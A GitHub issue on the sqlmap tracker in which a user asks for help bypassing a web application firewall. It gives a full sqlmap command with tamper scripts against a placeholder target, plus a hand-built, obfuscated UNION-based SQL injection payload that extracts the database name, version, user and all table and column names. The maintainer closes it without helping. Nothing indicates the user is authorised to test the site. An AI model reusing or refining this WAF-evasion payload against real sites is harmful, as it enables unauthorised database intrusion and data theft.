Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

PLEASE HELP . NOT A BUG REPORT JUST ASKING FOR HELP #5832

Closed
artzzzy opened this issue Dec 20, 2024 · 1 comment
Closed

PLEASE HELP . NOT A BUG REPORT JUST ASKING FOR HELP #5832

artzzzy opened this issue Dec 20, 2024 · 1 comment

Comments

@artzzzy
Copy link

artzzzy commented Dec 20, 2024

can you help me because i cant retrieve any data or bypassing this waf. already try all waf

sqlmap -u "http://www.target.com/about.php?ID=13" --tamper=space2plus,versionedkeywords --dbms=MYSQL --random-agent --level=5 --risk=3

and the response are 403 (Forbidden) - 15210 times . but when i try it by myself it working fine

http://wwwtarget.com/about.php?ID=.13+union+select+1,concat%23%0a(0x5a65726f20546f204865726f,0x3c62723e,0x3c62723e,0x44617461626173655f4e616d65203a3a ,database(),0x3c62723e,0x56657273696f6e203a3a20,version(),0x3c62723e,User()),3,(/!50000select%23%0A/(@A)/!50000from%23%0A/(/!50000select%23%0A/(@A:=0x00)%23%0A,(/!50000select%23%0A/%23%0A(@A)from(/!50000information_schema%23%0A/./!50000columns%23%0A/)/!50000where%23%0A/(/!50000table_schema%23%0A/!=0x696e666f726d6174696f6e5f736368656d61)/!50000and%23%0A/(@A)in%23%0A(@A:=concat%23%0A(@A,/!50000table_name%23%0A/,0x203a3a20,/!50000column_name%23%0A/,0x3c62723e))))a),5,6,7,8,9,10--+-

@stamparm
Copy link
Member

WAFs don't like scanners. i won't mind if anybody wants to help you. closing this down as its not a sqlmap issue

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants